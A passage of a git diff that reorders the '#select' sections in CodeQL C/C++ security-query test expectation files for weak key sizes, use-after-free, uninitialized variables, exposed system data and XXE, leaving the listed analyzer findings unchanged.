test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | -| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | -| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | edges nodes | test.cpp:34:45:34:48 | 1024 | semmle.label | 1024 | | test.cpp:35:49:35:52 | 1024 | semmle.label | 1024 | | test.cpp:37:43:37:46 | 1024 | semmle.label | 1024 | subpaths +#select +| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | +| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | +| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected index 670caa2291c6..b7decda26517 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected @@ -1,18 +1,3 @@ -#select -| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | -| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | -| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | -| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | -| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | -| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. | test.cpp:181:2:181:5 | call to free | call to free | -| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. | test.cpp:192:2:192:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | -| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | -| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | -| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | edges | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | provenance | | | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | provenance | | @@ -73,3 +58,18 @@ nodes | test.cpp:255:9:255:10 | *i2 [data] | semmle.label | *i2 [data] | | test.cpp:255:13:255:16 | data | semmle.label | data | subpaths +#select +| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | +| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | +| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | +| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | +| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | +| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. | test.cpp:181:2:181:5 | call to free | call to free | +| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. | test.cpp:192:2:192:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | +| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | +| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | +| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected index d35519d860fb..6773f5aef942 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.expected @@ -1,18 +1,3 @@ -#select -| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | -| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | -| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | -| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | -| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | -| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | -| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | -| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. | test.cpp:367:6:367:8 | val | val | -| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:422:9:422:9 | j | j | -| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | -| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | -| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | -| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | -| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | edges nodes | errors.cpp:13:7:13:7 | definition of x | semmle.label | definition of x | @@ -29,3 +14,18 @@ nodes | test.cpp:466:6:466:6 | definition of x | semmle.label | definition of x | | test.cpp:472:6:472:6 | definition of x | semmle.label | definition of x | | test.cpp:479:6:479:6 | definition of x | semmle.label | definition of x | +#select +| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | +| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | +| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | +| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | +| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | +| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | +| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | +| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. | test.cpp:367:6:367:8 | val | val | +| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:422:9:422:9 | j | j | +| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | +| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | +| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | +| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | +| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected index 62c2ad7896b4..3fc58925ff7b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected @@ -1,8 +1,8 @@ -#select -| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | edges | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | provenance | | nodes | tests.c:57:21:57:28 | *password | semmle.label | *password | | tests.c:70:70:70:77 | *password | semmle.label | *password | subpaths +#select +| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected index e678961de2e8..9756dde70dd3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected @@ -1,21 +1,3 @@ -#select -| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | -| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | -| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | -| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | -| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | -| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | -| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | -| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | -| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. | tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | -| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | -| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | edges | tests.cpp:62:7:62:18 | **global_token | tests.cpp:62:7:62:18 | **global_token | provenance | | | tests.cpp:62:7:62:18 | **global_token | tests.cpp:69:2:69:43 | *... = ... | provenance | | @@ -73,3 +55,21 @@ nodes | tests_passwd.cpp:18:29:18:31 | *pwd | semmle.label | *pwd | | tests_passwd.cpp:19:26:19:28 | *pwd | semmle.label | *pwd | subpaths +#select +| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | +| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | +| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | +| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | +| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | +| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | +| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | +| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | +| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. | tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | +| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | +| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected index 288e811fc737..1376a03ce889 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected @@ -1,34 +1,3 @@ -#select -| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | -| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | -| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | -| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | -| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | -| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | -| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | -| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | -| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | -| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | -| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | -| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | -| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | -| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | -| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | -| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | -| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | -| tests5.cpp:83:2:83:2 | *p | 